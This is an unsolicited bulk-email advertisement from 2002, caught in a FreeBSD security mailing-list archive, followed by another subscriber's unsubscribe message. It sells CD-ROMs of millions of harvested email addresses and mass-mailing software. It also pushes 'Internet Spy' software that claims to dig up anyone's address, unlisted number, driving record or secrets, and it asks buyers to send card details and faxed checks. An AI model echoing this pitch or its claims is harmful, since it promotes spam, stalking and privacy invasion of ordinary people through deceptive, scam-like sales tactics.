boundary="----=_NextPart_000_6F12_00007491.00002AC3" X-Priority: 3 X-MSMail-Priority: Normal Message-Id: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org ------=_NextPart_000_6F12_00007491.00002AC3 Content-Type: text/html;
Dear Consumer,

Increase your business sales! How??

By targeting millions of buyers via e-mail !!

We are offering over 10 million FRESH ,
DELIVERABLE, e-mail addresses on CD-ROM.
The cd-rom includes targeted addresses, such as business opportunity
seekers, sports buffs, mlm, impulsive buyers and investors.
The cd-rom also includes general internet, United States,
United kingdom, mixed domains, International, Canadian,
earthlink, aol, compuserve, misc. and much more. The list's
are divided into groups and are compressed. This will allow
you to use the names right off the cd.

ORDER IN THE NEXT 7 DAYS AND RECEIVE 4
BONUSES!!

*BONUS #1 Receive an additional cd-rom with millions of fresh,
deliverable general internet e-mail addresses free!!

 *BONUS #2 Receive 2000 how to books, reports and manuals
on cd-rom with reprint resale rights! Produce for pennies
and sale for BIG dollars!

 *BONUS #3 Receive the Mass mailer bulk delivery software,
with full operating instructions. This software will get the mail
out QUICK! NOTE---THIS SOFTWARE ALONE WILL COST
YOU 99.95 JUST ABOUT ANYWHERE ON THE WEB! (those who
order and do research will know that this offer is a steal) GUARANTEED!!

 *BONUS #4 Receive the informational guide to bulk e-mail.
This guide will give you all the information you need to get started!

 THIS IS A ONE TIME PACKAGE DEAL WORTH
HUNDREDS OF DOLLARS!!

I'M NOT DONE YET!!!!!!

LET ME HELP GET YOU STARTED.

Recieve Full and Total resale rights to one of the hottest selling
devices on the net......LISTEN CLOSE....

READY TO KNOW?

CONFIDENTIAL!

The SOFTWARE They Want BANNED In all 50 STATES.
Why? Because these secrets were never intended to reach your eyes...
Get the facts on anyuone!

Locate Missing Persons, find Lost Relatives, obtain Addresses
and Phone Numbers of old school friends, even Skip Trace Dead
Beat Spouses. This is not a Private Investigator, but a
sophisticated SOFTWARE program DESIGNED to automatically
CRACK YOUR CASE with links to thousands of Public Record databases.

Find out SECRETS about your relatives, friends, enemies,
and everyone else! Even your spouse! With the New,
INTERNET SPY AND YOU!

It's absolutely astounding! Here's what you can learn.

License plate number!
Get anyone's name and address with just a license plate number!

Driving record!
Get anyone's driving record!

Social security number!
Trace anyone by social security number!

Address!
Get anyone's address with just a name!

Unlisted phone numbers!
Get anyone's phone number with just a name even unlisted numbers!
Locate!
Long lost friends, relatives, a past lover who broke your heart!

E-mail!
Send anonymous e-mail completely untraceable!

Dirty secrets!
Discover dirty secrets your in-laws don't want you to know!

Investigate anyone!
Use the sources that private invesigators use (all on the Internet)
secretly!

Ex-spouse!
Learn how to get information on an ex-spouse that will help you
win in court! (Dig up old skeletons)!

Criminal search Background check!
Find out about your daughter's boyfriend!

Find out!
If you are being investigated!

Neighbors!
Learn all about your mysterious neighbors! Find out what they
have to hide!

People you work with!
Be astonished by what you'll learn about people you work with!

Education verification!
Did he really graduate college? Find out!

Internet Spy and You!
Software will help yuou discover ANYTHING about anyone, with
clickable hyperlinks and no typing in internet addresses! Just
insert the floppy disk and Go!

You will be shocked and amazed by the secrets that can be
discovered about absolutely everyone! Find out the secrets
they don't want you to know! About others, about yourself!

It's INCREDIBLE what you can find out using Internet Spy and You
and the Internet! You'll be riveted to your computer screen!
Get the software they're trying to ban! Before it's too late!

ACT NOW! THIS IS A LIMITED TIME OFFER!


RECEIVE THIS PACKAGE FOR THE ONE TIME
UNBELIEVABLE LOW, LOW PRICE OF ONLY<<< $69.97>>>
YOU WON'T FIND IT ANY CHEAPER....GUARANTEED....NOW IS
YOUR CHANCE TO GET IN ON THE HOTTEST FORM OF ONLINE
ADVERTISING AVAILABLE. DON'T MISS OUT. THIS INDUSTRY
IS JUST BEGINNING...

SIMPLY SEND $69.97,
ORDER INFORMATION:

SIMPLY SEND, FAX or CALL YOUR ORDER IN.

We Accept Visa - Mastercard - Discover, Check and Money Orders.

INCLUDE THE FOLLOWING INFORMATION
TO COMPLETE YOUR ORDER:

YOUR NAME:

ADDRESS:

STATE: CITY:

ZIP:

PHONE NUMBER:

FAX NUMBER:

EMAIL ADDRESS


CREDIT CARD #.
EXP. DATE:

NAME ON CARD.

Sign Here:__________________________________ Date:_____________

 This is a super low cost of $69.97 .
MAILING YOUR ORDER IN - COMPLETELY FILL OUT THE INFORMATION
ABOVE AND
SEND TO: CYBER CC
9163 W UNION HILLS DR #105-14
PEORIA, AZ 85382

If You fax a check, there is no need for you to mail the
original. We will draft a new check, with the exact
information from your original check. All checks
will beheld for bank clearance. (4-7 days)
Make payable to: CYBER CC
FAX TO: 602-392-8288

PASTE CHECK HERE
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>

WHEN PLACING AN ORDER BY PHONE,
SPEAK LOUD AND CLEAR AND SPELL OUT
ALL WORDS. WE NEED ALL THE INFORMATION ABOVE TO COMPLETE
ANY ORDER. CALL 602-392-8288 AND ENTER *3 AND THEN LEAVE YOUR ORDER.







This mailing is done by an independent marketing co.
We apologize if this message has reached you in error.
Save the Planet, Save the Trees! Advertise via E mail.
No wasted paper! Delete with one simple keystroke!
Less refuse in our Dumps! This is the new way of
the new millennium!

To be removed m6216551@yahoo.com
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jan 19 12:28: 1 2002 Delivered-To: freebsd-security@freebsd.org Received: from smtpzilla3.xs4all.nl (smtpzilla3.xs4all.nl [194.109.127.139]) by hub.freebsd.org (Postfix) with ESMTP id 4FB1137B404 for ; Sat, 19 Jan 2002 12:27:57 -0800 (PST) Received: from copernicus-it.nl (dragoneer.xs4all.nl [213.84.71.203]) by smtpzilla3.xs4all.nl (8.12.0/8.12.0) with ESMTP id g0JKRt0R026367; Sat, 19 Jan 2002 21:27:55 +0100 (CET) Message-ID: <3C49D684.6080800@copernicus-it.nl> Date: Sat, 19 Jan 2002 21:26:44 +0100 From: "Bob Lefevere (Copernicus)" User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-GB; rv:0.9.4) Gecko/20011128 Netscape6/6.2.1 X-Accept-Language: en-gb MIME-Version: 1.0 To: freebsd-security@FreeBSD.ORG Subject: unsubscribe Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message